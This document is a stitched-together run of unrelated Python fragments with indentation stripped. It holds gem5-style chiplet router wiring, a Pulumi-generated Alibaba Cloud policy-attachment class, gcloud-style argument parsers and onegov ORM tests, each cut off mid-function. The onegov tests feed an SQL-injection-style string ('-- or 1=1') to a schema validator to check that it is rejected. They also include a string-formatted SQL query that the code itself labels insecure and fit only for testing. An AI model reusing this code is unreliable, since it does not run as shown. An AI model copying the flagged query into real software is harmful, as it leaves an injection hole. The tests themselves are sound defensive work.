src_node=routers[cc_router_id],
dst_node=routers[xbar_id],
latency = interp_link_latency,
width = interp_link_width,
tx_clip = True,
rx_clip = True,
weight=1))
print_connection("Router", get_router_id(routers[cc_router_id]),
"Router", get_router_id(routers[xbar_id]),
link_count,
interp_link_latency, interp_link_width)
link_count += 1
# Rtr to CPU chiplet
int_links.append(IntLink(link_id=link_count,
src_node=routers[xbar_id],
dst_node=routers[cc_router_id],
latency = interp_link_latency,
width = interp_link_width,
tx_clip = True,
rx_clip = True,
weight=1))
print_connection("Router", get_router_id(routers[xbar_id]),
"Router", get_router_id(routers[cc_router_id]),
link_count,
interp_link_latency, interp_link_width)
link_count += 1
cc_router_id += num_cpus_per_chiplet
# Next, connect all other chiplets to xbar
# Router id of first L2 chiplet should be same as num_cpus
assert(l2c_router_start_id == len(cpu_nodes))
ncc_router_id = l2c_router_start_id
# Chiplet to Xbar
for ncc in xrange(num_l2_mc_dma_chiplets):
int_links.append(IntLink(link_id=link_count,
src_node=routers[ncc_router_id],
dst_node=routers[xbar_id],
latency = interp_link_latency,
width = interp_link_width,
tx_clip = True,
rx_clip = True,
weight=1))
print_connection("Router", get_router_id(routers[ncc_router_id]),
"Router", get_router_id(routers[xbar_id]),
link_count,
interp_link_latency, interp_link_width)
link_count += 1
# Xbar to chiplet
int_links.append(IntLink(link_id=link_count,
src_node=routers[xbar_id],
dst_node=routers[ncc_router_id],
latency = interp_link_latency,
width = interp_link_width,
tx_clip = True,
rx_clip = True,
weight=1))
print_connection("Router", get_router_id(routers[xbar_id]),
"Router", get_router_id(routers[ncc_router_id]),
link_count,
interp_link_latency, interp_link_width)
link_count += 1
ncc_router_id += 1
# At the end ncc_router_id should be same as last chiplet, namely xbar
        assert(ncc_router_id == xbar_id)
# coding=utf-8
# *** WARNING: this file was generated by the Pulumi Terraform Bridge (tfgen) Tool. ***
# *** Do not edit by hand unless you're certain you know what you are doing! ***
import warnings
import pulumi
import pulumi.runtime
from typing import Any, Mapping, Optional, Sequence, Union, overload
from .. import _utilities
__all__ = ['PolicyAttachmentArgs', 'PolicyAttachment']
@pulumi.input_type
class PolicyAttachmentArgs:
def __init__(__self__, *,
policy_name: pulumi.Input[str],
policy_type: pulumi.Input[str],
principal_name: pulumi.Input[str],
principal_type: pulumi.Input[str],
resource_group_id: pulumi.Input[str]):
"""
The set of arguments for constructing a PolicyAttachment resource.
:param pulumi.Input[str] policy_name: The name of the policy. name must be 1 to 128 characters in length and can contain letters, digits, and hyphens (-).
:param pulumi.Input[str] policy_type: - (Required, ForceNew) The type of the policy. Valid values: `Custom`, `System`.
:param pulumi.Input[str] principal_name: The name of the object to which you want to attach the policy.
:param pulumi.Input[str] principal_type: The type of the object to which you want to attach the policy. Valid values: `IMSUser`: RAM user, `IMSGroup`: RAM user group, `ServiceRole`: RAM role.
:param pulumi.Input[str] resource_group_id: The ID of the resource group or the ID of the Alibaba Cloud account to which the resource group belongs.
"""
pulumi.set(__self__, "policy_name", policy_name)
pulumi.set(__self__, "policy_type", policy_type)
pulumi.set(__self__, "principal_name", principal_name)
pulumi.set(__self__, "principal_type", principal_type)
pulumi.set(__self__, "resource_group_id", resource_group_id)
@property
@pulumi.getter(name="policyName")
def policy_name(self) -> pulumi.Input[str]:
"""
The name of the policy. name must be 1 to 128 characters in length and can contain letters, digits, and hyphens (-).
"""
return pulumi.get(self, "policy_name")
@policy_name.setter
def policy_name(self, value: pulumi.Input[str]):
pulumi.set(self, "policy_name", value)
@property
@pulumi.getter(name="policyType")
def policy_type(self) -> pulumi.Input[str]:
"""
- (Required, ForceNew) The type of the policy. Valid values: `Custom`, `System`.
"""
return pulumi.get(self, "policy_type")
@policy_type.setter
def policy_type(self, value: pulumi.Input[str]):
pulumi.set(self, "policy_type", value)
@property
@pulumi.getter(name="principalName")
def principal_name(self) -> pulumi.Input[str]:
"""
The name of the object to which you want to attach the policy.
"""
return pulumi.get(self, "principal_name")
@principal_name.setter
def principal_name(self, value: pulumi.Input[str]):
pulumi.set(self, "principal_name", value)
@property
@pulumi.getter(name="principalType")
def principal_type(self) -> pulumi.Input[str]:
"""
The type of the object to which you want to attach the policy. Valid values: `IMSUser`: RAM user, `IMSGroup`: RAM user group, `ServiceRole`: RAM role.
"""
return pulumi.get(self, "principal_type")
@principal_type.setter
def principal_type(self, value: pulumi.Input[str]):
pulumi.set(self, "principal_type", value)
@property
@pulumi.getter(name="resourceGroupId")
def resource_group_id(self) -> pulumi.Input[str]:
"""
The ID of the resource group or the ID of the Alibaba Cloud account to which the resource group belongs.
"""
return pulumi.get(self, "resource_group_id")
@resource_group_id.setter
def resource_group_id(self, value: pulumi.Input[str]):
pulumi.set(self, "resource_group_id", value)
@pulumi.input_type
class _PolicyAttachmentState:
def __init__(__self__, *,
policy_name: Optional[pulumi.Input[str]] = None,
policy_type: Optional[pulumi.Input[str]] = None,
principal_name: Optional[pulumi.Input[str]] = None,
principal_type: Optional[pulumi.Input[str]] = None,
resource_group_id: Optional[pulumi.Input[str]] = None):
"""
Input properties used for looking up and filtering PolicyAttachment resources.
:param pulumi.Input[str] policy_name: The name of the policy. name must be 1 to 128 characters in length and can contain letters, digits, and hyphens (-).
:param pulumi.Input[str] policy_type: - (Required, ForceNew) The type of the policy. Valid values: `Custom`, `System`.
:param pulumi.Input[str] principal_name: The name of the object to which you want to attach the policy.
:param pulumi.Input[str] principal_type: The type of the object to which you want to attach the policy. Valid values: `IMSUser`: RAM user, `IMSGroup`: RAM user group, `ServiceRole`: RAM role.
:param pulumi.Input[str] resource_group_id: The ID of the resource group or the ID of the Alibaba Cloud account to which the resource group belongs.
"""
if policy_name is not None:
pulumi.set(__self__, "policy_name", policy_name)
if policy_type is not None:
pulumi.set(__self__, "policy_type", policy_type)
if principal_name is not None:
pulumi.set(__self__, "principal_name", principal_name)
if principal_type is not None:
pulumi.set(__self__, "principal_type", principal_type)
if resource_group_id is not None:
pulumi.set(__self__, "resource_group_id", resource_group_id)
@property
@pulumi.getter(name="policyName")
def policy_name(self) -> Optional[pulumi.Input[str]]:
"""
The name of the policy. name must be 1 to 128 characters in length and can contain letters, digits, and hyphens (-).
"""
return pulumi.get(self, "policy_name")
@policy_name.setter
def policy_name(self, value: Optional[pulumi.Input[str]]):
pulumi.set(self, "policy_name", value)
@property
@pulumi.getter(name="policyType")
def policy_type(self) -> Optional[pulumi.Input[str]]:
"""
- (Required, ForceNew) The type of the policy. Valid values: `Custom`, `System`.
"""
return pulumi.get(self, "policy_type")
@policy_type.setter
def policy_type(self, value: Optional[pulumi.Input[str]]):
pulumi.set(self, "policy_type", value)
@property
@pulumi.getter(name="principalName")
def principal_name(self) -> Optional[pulumi.Input[str]]:
"""
The name of the object to which you want to attach the policy.
"""
return pulumi.get(self, "principal_name")
@principal_name.setter
def principal_name(self, value: Optional[pulumi.Input[str]]):
pulumi.set(self, "principal_name", value)
@property
@pulumi.getter(name="principalType")
def principal_type(self) -> Optional[pulumi.Input[str]]:
"""
The type of the object to which you want to attach the policy. Valid values: `IMSUser`: RAM user, `IMSGroup`: RAM user group, `ServiceRole`: RAM role.
"""
return pulumi.get(self, "principal_type")
@principal_type.setter
def principal_type(self, value: Optional[pulumi.Input[str]]):
pulumi.set(self, "principal_type", value)
@property
@pulumi.getter(name="resourceGroupId")
def resource_group_id(self) -> Optional[pulumi.Input[str]]:
"""
The ID of the resource group or the ID of the Alibaba Cloud account to which the resource group belongs.
"""
return pulumi.get(self, "resource_group_id")
@resource_group_id.setter
def resource_group_id(self, value: Optional[pulumi.Input[str]]):
pulumi.set(self, "resource_group_id", value)
class PolicyAttachment(pulumi.CustomResource):
@overload
def __init__(__self__,
resource_name: str,
opts: Optional[pulumi.ResourceOptions] = None,
policy_name: Optional[pulumi.Input[str]] = None,
policy_type: Optional[pulumi.Input[str]] = None,
principal_name: Optional[pulumi.Input[str]] = None,
principal_type: Optional[pulumi.Input[str]] = None,
resource_group_id: Optional[pulumi.Input[str]] = None,
__props__=None):
"""
        Provides a Resource Manager Policy Attachment resource to attach a policy to an object. After you attach a policy to an object, the object has the operation permissions on the current resource group or the resources under the current account.
For information about Resource Manager Policy Attachment and how to use it, see [How to authorize and manage resource groups](https://www.alibabacloud.com/help/en/doc-detail/94490.htm).
> **NOTE:** Available in v1.93.0+.
## Import
Resource Manager Policy Attachment can be imported using the id, e.g.
```sh
$ pulumi import alicloud:resourcemanager/policyAttachment:PolicyAttachment example tf-testaccrdpolicy:Custom:tf-testaccrdpolicy@11827252********.onaliyun.com:IMSUser:rg******
```
:param str resource_name: The name of the resource.
:param pulumi.ResourceOptions opts: Options for the resource.
:param pulumi.Input[str] policy_name: The name of the policy. name must be 1 to 128 characters in length and can contain letters, digits, and hyphens (-).
:param pulumi.Input[str] policy_type: - (Required, ForceNew) The type of the policy. Valid values: `Custom`, `System`.
:param pulumi.Input[str] principal_name: The name of the object to which you want to attach the policy.
:param pulumi.Input[str] principal_type: The type of the object to which you want to attach the policy. Valid values: `IMSUser`: RAM user, `IMSGroup`: RAM user group, `ServiceRole`: RAM role.
:param pulumi.Input[str] resource_group_id: The ID of the resource group or the ID of the Alibaba Cloud account to which the resource group belongs.
"""
...
@overload
def __init__(__self__,
resource_name: str,
args: PolicyAttachmentArgs,
opts: Optional[pulumi.ResourceOptions] = None):
"""
        Provides a Resource Manager Policy Attachment resource to attach a policy to an object. After you attach a policy to an object, the object has the operation permissions on the current resource group or the resources under the current account.
For information about Resource Manager Policy Attachment and how to use it, see [How to authorize and manage resource groups](https://www.alibabacloud.com/help/en/doc-detail/94490.htm).
> **NOTE:** Available in v1.93.0+.
## Import
Resource Manager Policy Attachment can be imported using the id, e.g.
```sh
$ pulumi import alicloud:resourcemanager/policyAttachment:PolicyAttachment example tf-testaccrdpolicy:Custom:tf-testaccrdpolicy@11827252********.onaliyun.com:IMSUser:rg******
```
:param str resource_name: The name of the resource.
:param PolicyAttachmentArgs args: The arguments to use to populate this resource's properties.
:param pulumi.ResourceOptions opts: Options for the resource.
"""
...
def __init__(__self__, resource_name: str, *args, **kwargs):
resource_args, opts = _utilities.get_resource_args_opts(PolicyAttachmentArgs, pulumi.ResourceOptions, *args, **kwargs)
if resource_args is not None:
__self__._internal_init(resource_name, opts, **resource_args.__dict__)
else:
__self__._internal_init(resource_name, *args, **kwargs)
def _internal_init(__self__,
resource_name: str,
opts: Optional[pulumi.ResourceOptions] = None,
policy_name: Optional[pulumi.Input[str]] = None,
policy_type: Optional[pulumi.Input[str]] = None,
principal_name: Optional[pulumi.Input[str]] = None,
principal_type: Optional[pulumi.Input[str]] = None,
resource_group_id: Optional[pulumi.Input[str]] = None,
__props__=None):
if opts is None:
opts = pulumi.ResourceOptions()
if not isinstance(opts, pulumi.ResourceOptions):
raise TypeError('Expected resource options to be a ResourceOptions instance')
if opts.version is None:
opts.version = _utilities.get_version()
if opts.id is None:
if __props__ is not None:
raise TypeError('__props__ is only valid when passed in combination with a valid opts.id to get an existing resource')
__props__ = PolicyAttachmentArgs.__new__(PolicyAttachmentArgs)
if policy_name is None and not opts.urn:
raise TypeError("Missing required property 'policy_name'")
__props__.__dict__["policy_name"] = policy_name
if policy_type is None and not opts.urn:
raise TypeError("Missing required property 'policy_type'")
__props__.__dict__["policy_type"] = policy_type
if principal_name is None and not opts.urn:
raise TypeError("Missing required property 'principal_name'")
__props__.__dict__["principal_name"] = principal_name
        if principal_type is None and not opts.urn:
            raise TypeError("Missing required property 'principal_type'")
        __props__.__dict__["principal_type"] = principal_type
str, An inclusive lower bound for values.
upper_bound: str, An inclusive upper bound for values.
Raises:
ArgumentTypeError: If either the lower_bound or upper_bound
cannot be parsed. The returned function will also raise this
error if it cannot parse its input. This exception is also
raised if the returned function receives an out-of-bounds
input.
Returns:
A function that accepts a single time duration as input to be
parsed.
"""
def Parse(value):
"""Parses a duration from value and returns integer seconds."""
try:
return int(
times.ParseDuration(value, default_suffix=default_unit).total_seconds)
except times.Error as e:
message = six.text_type(e).rstrip('.')
raise ArgumentTypeError(_GenerateErrorMessage(
          'Failed to parse duration: {0}'.format(message), user_input=value))
parsed_lower_bound = Parse(lower_bound)
if upper_bound is None:
parsed_upper_bound = None
else:
parsed_upper_bound = Parse(upper_bound)
def ParseWithBoundsChecking(value):
"""Same as Parse except bound checking is performed."""
if value is None:
return None
parsed_value = Parse(value)
if parsed_lower_bound is not None and parsed_value < parsed_lower_bound:
raise ArgumentTypeError(_GenerateErrorMessage(
'value must be greater than or equal to {0}'.format(lower_bound),
user_input=value))
if parsed_upper_bound is not None and parsed_value > parsed_upper_bound:
raise ArgumentTypeError(_GenerateErrorMessage(
'value must be less than or equal to {0}'.format(upper_bound),
user_input=value))
return parsed_value
return ParseWithBoundsChecking
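# Example (sketch, assuming seconds as the default unit): the parser returned above
# maps '30' -> 30 and '2m' -> 120 (integer seconds), and raises ArgumentTypeError for
# values outside [lower_bound, upper_bound].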
def BinarySize(lower_bound=None, upper_bound=None,
suggested_binary_size_scales=None, default_unit='G',
type_abbr='B'):
"""Returns a function that can parse binary sizes.
Binary sizes are defined as base-2 values representing number of
bytes.
Input to the parsing function must be a string of the form:
INTEGER[UNIT]
The integer must be non-negative. Valid units are "B", "KB", "MB",
"GB", "TB", "KiB", "MiB", "GiB", "TiB", "PiB". If the unit is
omitted then default_unit is assumed.
The result is parsed in bytes. For example:
parser = BinarySize()
    assert parser('10GB') == 10737418240
Args:
lower_bound: str, An inclusive lower bound for values.
upper_bound: str, An inclusive upper bound for values.
suggested_binary_size_scales: list, A list of strings with units that will
be recommended to user.
default_unit: str, unit used when user did not specify unit.
type_abbr: str, the type suffix abbreviation, e.g., B for bytes, b/s for
bits/sec.
Raises:
ArgumentTypeError: If either the lower_bound or upper_bound
cannot be parsed. The returned function will also raise this
error if it cannot parse its input. This exception is also
raised if the returned function receives an out-of-bounds
input.
Returns:
A function that accepts a single binary size as input to be
parsed.
"""
return _ValueParser(
_BINARY_SIZE_SCALES, default_unit=default_unit, lower_bound=lower_bound,
upper_bound=upper_bound, strict_case=False, type_abbr=type_abbr,
suggested_binary_size_scales=suggested_binary_size_scales)
_KV_PAIR_DELIMITER = '='
class Range(object):
"""Range of integer values."""
def __init__(self, start, end):
self.start = start
self.end = end
@staticmethod
def Parse(string_value):
"""Creates Range object out of given string value."""
match = re.match(_RANGE_PATTERN, string_value)
if not match:
raise ArgumentTypeError('Expected a non-negative integer value or a '
'range of such values instead of "{0}"'
.format(string_value))
start = int(match.group('start'))
end = match.group('end')
if end is None:
end = start
else:
end = int(end)
if end < start:
      raise ArgumentTypeError('Expected range start {0} smaller than or equal to '
'range end {1} in "{2}"'.format(
start, end, string_value))
return Range(start, end)
def Combine(self, other):
"""Combines two overlapping or adjacent ranges, raises otherwise."""
if self.end + 1 < other.start or self.start > other.end + 1:
raise Error('Cannot combine non-overlapping or non-adjacent ranges '
'{0} and {1}'.format(self, other))
return Range(min(self.start, other.start), max(self.end, other.end))
def __eq__(self, other):
if isinstance(other, Range):
return self.start == other.start and self.end == other.end
return False
def __lt__(self, other):
if self.start == other.start:
return self.end < other.end
return self.start < other.start
def __str__(self):
if self.start == self.end:
return str(self.start)
return '{0}-{1}'.format(self.start, self.end)
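# Example (sketch): Range.Parse('2-5') yields start=2, end=5; combining it with
# Range.Parse('4-8') gives a range printing as '2-8', while non-adjacent ranges such
# as '2-3' and '7-9' make Combine() raise Error.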
class HostPort(object):
"""A class for holding host and port information."""
IPV4_OR_HOST_PATTERN = r'^(?P<address>[\w\d\.-]+)?(:|:(?P<port>[\d]+))?$'
# includes hostnames
IPV6_PATTERN = r'^(\[(?P<address>[\w\d:]+)\])(:|:(?P<port>[\d]+))?$'
def __init__(self, host, port):
self.host = host
self.port = port
@staticmethod
def Parse(s, ipv6_enabled=False):
"""Parse the given string into a HostPort object.
This can be used as an argparse type.
Args:
s: str, The string to parse. If ipv6_enabled and host is an IPv6 address,
it should be placed in square brackets: e.g.
[2001:db8:0:0:0:ff00:42:8329]
or
[2001:db8:0:0:0:ff00:42:8329]:8080
ipv6_enabled: boolean, If True then accept IPv6 addresses.
Raises:
ArgumentTypeError: If the string is not valid.
Returns:
HostPort, The parsed object.
"""
if not s:
return HostPort(None, None)
match = re.match(HostPort.IPV4_OR_HOST_PATTERN, s, re.UNICODE)
if ipv6_enabled and not match:
match = re.match(HostPort.IPV6_PATTERN, s, re.UNICODE)
if not match:
raise ArgumentTypeError(_GenerateErrorMessage(
'Failed to parse host and port. Expected format \n\n'
' IPv4_ADDRESS_OR_HOSTNAME:PORT\n\n'
'or\n\n'
' [IPv6_ADDRESS]:PORT\n\n'
'(where :PORT is optional).',
user_input=s))
elif not match:
raise ArgumentTypeError(_GenerateErrorMessage(
'Failed to parse host and port. Expected format \n\n'
' IPv4_ADDRESS_OR_HOSTNAME:PORT\n\n'
'(where :PORT is optional).',
user_input=s))
return HostPort(match.group('address'), match.group('port'))
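# Example (sketch): HostPort.Parse('example.com:8080') returns host='example.com' and
# port='8080' (both strings); HostPort.Parse('[2001:db8::1]:443', ipv6_enabled=True)
# returns host='2001:db8::1', port='443'; an empty string yields HostPort(None, None).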
class Day(object):
"""A class for parsing a datetime object for a specific day."""
@staticmethod
def Parse(s):
if not s:
return None
try:
return times.ParseDateTime(s, '%Y-%m-%d').date()
except times.Error as e:
raise ArgumentTypeError(
_GenerateErrorMessage(
'Failed to parse date: {0}'.format(six.text_type(e)),
user_input=s))
class Datetime(object):
"""A class for parsing a datetime object in UTC timezone."""
@staticmethod
def Parse(s):
"""Parses a string value into a Datetime object."""
if not s:
return None
try:
return times.ParseDateTime(s)
except times.Error as e:
raise ArgumentTypeError(
_GenerateErrorMessage(
'Failed to parse date/time: {0}'.format(six.text_type(e)),
user_input=s))
class DayOfWeek(object):
"""A class for parsing a day of the week."""
DAYS = ['SUN', 'MON', 'TUE', 'WED', 'THU', 'FRI', 'SAT']
@staticmethod
def Parse(s):
"""Validates and normalizes a string as a day of the week."""
if not s:
return None
fixed = s.upper()[:3]
if fixed not in DayOfWeek.DAYS:
raise ArgumentTypeError(
_GenerateErrorMessage(
'Failed to parse day of week. Value should be one of {0}'.format(
', '.join(DayOfWeek.DAYS)),
user_input=s))
return fixed
def _BoundedType(type_builder, type_description,
lower_bound=None, upper_bound=None, unlimited=False):
"""Returns a function that can parse given type within some bound.
Args:
type_builder: A callable for building the requested type from the value
string.
type_description: str, Description of the requested type (for verbose
messages).
lower_bound: of type compatible with type_builder,
The value must be >= lower_bound.
upper_bound: of type compatible with type_builder,
The value must be <= upper_bound.
unlimited: bool, If True then a value of 'unlimited' means no limit.
Returns:
A function that can parse given type within some bound.
"""
def Parse(value):
"""Parses value as a type constructed by type_builder.
Args:
value: str, Value to be converted to the requested type.
Raises:
ArgumentTypeError: If the provided value is out of bounds or unparsable.
Returns:
Value converted to the requested type.
"""
if unlimited and value == 'unlimited':
return None
try:
v = type_builder(value)
except ValueError:
raise ArgumentTypeError(
_GenerateErrorMessage('Value must be {0}'.format(type_description),
user_input=value))
if lower_bound is not None and v < lower_bound:
raise ArgumentTypeError(
_GenerateErrorMessage(
'Value must be greater than or equal to {0}'.format(lower_bound),
user_input=value))
if upper_bound is not None and upper_bound < v:
raise ArgumentTypeError(
_GenerateErrorMessage(
'Value must be less than or equal to {0}'.format(upper_bound),
user_input=value))
return v
return Parse
def BoundedInt(*args, **kwargs):
return _BoundedType(int, 'an integer', *args, **kwargs)
def BoundedFloat(*args, **kwargs):
return _BoundedType(float, 'a floating point number', *args, **kwargs)
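# Example (sketch): BoundedInt(1, 10)('5') == 5, BoundedInt(1, 10)('42') raises
# ArgumentTypeError, and BoundedInt(unlimited=True)('unlimited') returns None.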
def _TokenizeQuotedList(arg_value, delim=','):
"""Tokenize an argument into a list.
Args:
arg_value: str, The raw argument.
delim: str, The delimiter on which to split the argument string.
Returns:
[str], The tokenized list.
"""
if arg_value:
if not arg_value.endswith(delim):
arg_value += delim
return arg_value.split(delim)[:-1]
return []
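# Example (sketch): _TokenizeQuotedList('a,b,c') == ['a', 'b', 'c'];
# _TokenizeQuotedList('') == [], and a trailing delimiter does not add an empty item.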
class ArgType(object):
"""Base class for arg types."""
class ArgBoolean(ArgType):
"""Interpret an argument value as a bool."""
def __init__(
self, truthy_strings=None, falsey_strings=None, case_sensitive=False):
self._case_sensitive = case_sensitive
if truthy_strings:
self._truthy_strings = truthy_strings
else:
self._truthy_strings = ['true', 'yes']
if falsey_strings:
self._falsey_strings = falsey_strings
else:
self._falsey_strings = ['false', 'no']
def __call__(self, arg_value):
if not self._case_sensitive:
normalized_arg_value = arg_value.lower()
else:
normalized_arg_value = arg_value
if normalized_arg_value in self._truthy_strings:
return True
if normalized_arg_value in self._falsey_strings:
return False
raise ArgumentTypeError(
'Invalid flag value [{0}], expected one of [{1}]'.format(
arg_value,
', '.join(self._truthy_strings + self._falsey_strings)
)
)
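# Example (sketch): with the defaults, ArgBoolean()('Yes') is True and ArgBoolean()('NO')
# is False (matching is case-insensitive); any other string raises ArgumentTypeError.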
class ArgList(ArgType):
"""Interpret an argument value as a list.
Intended to be used as the type= for a flag argument. Splits the string on
commas or another delimiter and returns a list.
By default, splits on commas:
'a,b,c' -> ['a', 'b', 'c']
There is an available syntax for using an alternate delimiter:
'^:^a,b:c' -> ['a,b', 'c']
'^::^a:b::c' -> ['a:b', 'c']
'^,^^a^,b,c' -> ['^a^', ',b', 'c']
"""
DEFAULT_DELIM_CHAR = ','
ALT_DELIM_CHAR = '^'
def __init__(self, element_type=None, min_length=0, max_length=None,
choices=None):
| |
import morepath
import pytest
import pickle
import sqlalchemy
import time
import transaction
import uuid
from datetime import datetime
from dogpile.cache.api import NO_VALUE
from onegov.core.framework import Framework
from onegov.core.orm import (
ModelBase, SessionManager, as_selectable, translation_hybrid, find_models
)
from onegov.core.orm.abstract import AdjacencyList
from onegov.core.orm.abstract import Associable, associated
from onegov.core.orm.func import unaccent
from onegov.core.orm.mixins import meta_property
from onegov.core.orm.mixins import content_property
from onegov.core.orm.mixins import dict_property
from onegov.core.orm.mixins import ContentMixin
from onegov.core.orm.mixins import TimestampMixin
from onegov.core.orm import orm_cached
from onegov.core.orm.types import HSTORE, JSON, UTCDateTime, UUID
from onegov.core.orm.types import LowercaseText
from onegov.core.security import Private
from onegov.core.utils import scan_morepath_modules
from psycopg2.extensions import TransactionRollbackError
from pytz import timezone
from sqlalchemy import Column, Integer, Text, ForeignKey, func, select, and_
from sqlalchemy.exc import OperationalError
from sqlalchemy.ext.declarative import declarative_base
from sqlalchemy.ext.mutable import MutableDict
from sqlalchemy.orm import relationship
from sqlalchemy.orm.exc import DetachedInstanceError
from sqlalchemy_utils import aggregated
from threading import Thread
from webob.exc import HTTPUnauthorized, HTTPConflict
from webtest import TestApp as Client
class PicklePage(AdjacencyList):
__tablename__ = 'picklepages'
def test_is_valid_schema(postgres_dsn):
mgr = SessionManager(postgres_dsn, None)
assert not mgr.is_valid_schema('pg_test')
assert not mgr.is_valid_schema('-- or 1=1')
assert not mgr.is_valid_schema('0')
assert not mgr.is_valid_schema('information_schema')
assert not mgr.is_valid_schema('public')
assert not mgr.is_valid_schema('my--schema')
assert mgr.is_valid_schema('my_schema')
assert mgr.is_valid_schema('my-schema')
def test_independent_sessions(postgres_dsn):
Base = declarative_base(cls=ModelBase)
class Document(Base):
__tablename__ = 'document'
id = Column(Integer, primary_key=True)
mgr = SessionManager(postgres_dsn, Base)
mgr.set_current_schema('foo')
s1 = mgr.session()
s1.add(Document())
s1.flush()
mgr.set_current_schema('bar')
s2 = mgr.session()
assert s1 is not s2
assert s1.query(Document).count() == 1
assert s2.query(Document).count() == 0
mgr.dispose()
def test_independent_managers(postgres_dsn):
Base = declarative_base(cls=ModelBase)
class Document(Base):
__tablename__ = 'document'
id = Column(Integer, primary_key=True)
one = SessionManager(postgres_dsn, Base)
two = SessionManager(postgres_dsn, Base)
one.set_current_schema('foo')
two.set_current_schema('foo')
assert one.session() is not two.session()
assert one.session() is one.session()
assert two.session() is two.session()
one.session().add(Document())
one.session().flush()
assert one.session().query(Document).count() == 1
assert two.session().query(Document).count() == 0
one.set_current_schema('bar')
    assert one.session().info == {'schema': 'bar'}
    assert two.session().info == {'schema': 'foo'}
one.dispose()
two.dispose()
def test_create_schema(postgres_dsn):
Base = declarative_base(cls=ModelBase)
class Document(Base):
__tablename__ = 'document'
id = Column(Integer, primary_key=True)
title = Column(Text)
mgr = SessionManager(postgres_dsn, Base)
# we need a schema to use the session manager and it can't be 'public'
mgr.set_current_schema('testing')
def existing_schemas():
# DO NOT copy this query, it's insecure (which is fine in testing)
return set(
r['schema_name'] for r in mgr.engine.execute(
'SELECT schema_name FROM information_schema.schemata'
)
)
def schema_tables(schema):
# DO NOT copy this query, it's insecure (which is fine in testing)
return set(
r['tablename'] for r in mgr.engine.execute((
"SELECT tablename FROM pg_catalog.pg_tables "
"WHERE schemaname = '{}'".format(schema)
))
)
assert 'testing' in existing_schemas()
assert 'new' not in existing_schemas()
mgr.ensure_schema_exists('new')
assert 'new' in existing_schemas()
assert 'document' in schema_tables('new')
mgr.dispose()
def test_schema_bound_session(postgres_dsn):
Base = declarative_base(cls=ModelBase)
class Document(Base):
__tablename__ = 'documents'
id = Column(Integer, primary_key=True)
title = Column(Text)
mgr = SessionManager(postgres_dsn, Base)
mgr.set_current_schema('foo')
session = mgr.session()
session.add(Document(title='Welcome to Foo'))
transaction.commit()
assert session.query(Document).one().title == 'Welcome to Foo'
mgr.set_current_schema('bar')
session = mgr.session()
assert session.query(Document).first() is None
mgr.set_current_schema('foo')
session = mgr.session()
assert session.query(Document).one().title == 'Welcome to Foo'
mgr.dispose()
def test_session_scope(postgres_dsn):
Base = declarative_base(cls=ModelBase)
mgr = SessionManager(postgres_dsn, Base)
mgr.set_current_schema('foo')
foo_session = mgr.session()
mgr.set_current_schema('bar')
bar_session = mgr.session()
assert foo_session is not bar_session
mgr.set_current_schema('foo')
foo_session_2 = mgr.session()
mgr.set_current_schema('bar')
bar_session_2 = mgr.session()
assert foo_session is foo_session_2
assert bar_session is bar_session_2
mgr.dispose()
def test_orm_scenario(postgres_dsn, redis_url):
    # test a somewhat complete ORM scenario in which we create and read data
    # for different applications
Base = declarative_base(cls=ModelBase)
class App(Framework):
pass
class Document(Base):
__tablename__ = 'documents'
id = Column(Integer, primary_key=True)
title = Column(Text, nullable=False)
class DocumentCollection(object):
def __init__(self, session):
self.session = session
def query(self):
return self.session.query(Document)
def all(self):
return self.query().all()
def get(self, id):
return self.query().filter(Document.id == id).first()
def add(self, title):
document = Document(title=title)
self.session.add(document)
self.session.flush()
return document
@App.path(model=DocumentCollection, path='documents')
def get_documents(app):
return DocumentCollection(app.session())
@App.json(model=DocumentCollection)
def documents_default(self, request):
return {d.id: d.title for d in self.all()}
@App.json(model=DocumentCollection, name='add', request_method='POST')
def documents_add(self, request):
self.add(title=request.params.get('title'))
@App.json(model=DocumentCollection, name='error')
def documents_error(self, request):
# tries to create a document that should not be created since the
# request as a whole fails
self.add('error')
raise HTTPUnauthorized()
# this is required for the transactions to actually work, usually this
# would be onegov.server's job
scan_morepath_modules(App)
app = App()
app.configure_application(dsn=postgres_dsn, base=Base, redis_url=redis_url)
app.namespace = 'municipalities'
c = Client(app)
# let's try to add some documents to new york
app.set_application_id('municipalities/new-york')
assert c.get('/documents').json == {}
c.post('/documents/add', {'title': 'Welcome to the big apple!'})
assert c.get('/documents').json == {
'1': "Welcome to the big apple!"
}
# after that, we switch to chicago, where a different set of documents
# should exist
app.set_application_id('municipalities/chicago')
assert c.get('/documents').json == {}
c.post('/documents/add', {'title': 'Welcome to the windy city!'})
assert c.get('/documents').json == {
'1': "Welcome to the windy city!"
}
# finally, let's see if the transaction is rolled back if there's an
# error during the course of the request
c.get('/documents/error', expect_errors=True)
assert c.get('/documents').json == {
'1': "Welcome to the windy city!"
}
app.session_manager.dispose()
def test_i18n_with_request(postgres_dsn, redis_url):
Base = declarative_base(cls=ModelBase)
class App(Framework):
pass
class Document(Base):
__tablename__ = 'documents'
id = Column(Integer, primary_key=True)
title_translations = Column(HSTORE, nullable=False)
title = translation_hybrid(title_translations)
@App.path(model=Document, path='document')
def get_document(app):
return app.session().query(Document).first() or Document(id=1)
@App.json(model=Document)
def view_document(self, request):
return {'title': self.title}
@App.json(model=Document, request_method='PUT')
def put_document(self, request):
self.title = request.params.get('title')
app.session().merge(self)
@App.setting(section='i18n', name='default_locale')
def get_i18n_default_locale():
return 'de_CH'
scan_morepath_modules(App)
app = App()
app.configure_application(dsn=postgres_dsn, base=Base, redis_url=redis_url)
app.namespace = 'municipalities'
app.set_application_id('municipalities/new-york')
app.locales = ['de_CH', 'en_US']
c = Client(app)
c.put('/document?title=Dokument')
assert c.get('/document').json == {'title': 'Dokument'}
c.set_cookie('locale', 'en_US')
c.put('/document?title=Document')
assert c.get('/document').json == {'title': 'Document'}
c.set_cookie('locale', '')
assert c.get('/document').json == {'title': 'Dokument'}
app.session_manager.dispose()
def test_json_type(postgres_dsn):
Base = declarative_base(cls=ModelBase)
class Test(Base):
__tablename__ = 'test'
id = Column(Integer, primary_key=True)
data = Column(JSON, nullable=True)
mgr = SessionManager(postgres_dsn, Base)
mgr.set_current_schema('testing')
session = mgr.session()
test = Test(id=1, data=None)
session.add(test)
transaction.commit()
    # our json type automatically coerces None to an empty dict
assert session.query(Test).filter(Test.id == 1).one().data == {}
assert session.execute('SELECT data::text from test').scalar() == '{}'
test = Test(id=2, data={'foo': 'bar'})
session.add(test)
transaction.commit()
assert session.query(Test).filter(Test.id == 2).one().data == {
'foo': 'bar'
}
test = session.query(Test).filter(Test.id == 2).one()
test.data['foo'] = 'rab'
transaction.commit()
assert session.query(Test).filter(Test.id == 2).one().data == {
'foo': 'rab'
